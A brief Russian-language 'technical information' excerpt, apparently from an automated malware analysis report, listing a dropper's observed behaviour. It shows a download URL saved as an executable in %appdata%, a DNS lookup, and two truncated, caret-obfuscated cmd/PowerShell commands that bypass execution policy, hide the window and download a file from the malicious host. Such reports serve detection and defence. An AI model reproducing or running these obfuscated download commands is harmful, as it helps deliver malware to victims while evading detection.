Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^w^eRsh^e^ll.E^xe^ -EXec^U^t^io^N^POlicY byPasS -^noP^Rof^iLe -Wi^nD^O^WS^TyL^e^ ^HiddEn ^(N^eW-oBj^ECt^ sy^S^Tem.^NEt^.we^BCLI^EnT).^DOWNLOa^DfIl^E('http://www.fopeioaas.to...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /C "po^w^eRsh^e^ll.E^xe^ -EXec^U^t^io^N^POlicY byPasS -^noP^Rof^iLe -Wi^nD^O^WS^TyL^e^ ^HiddEn ^(N^eW-oBj^ECt^ sy^S^Tem.^NEt^.we^BCLI^EnT).^DOWNLOa^DfIl^E('http://www.fopeioaas.to...' (со скрытым окном)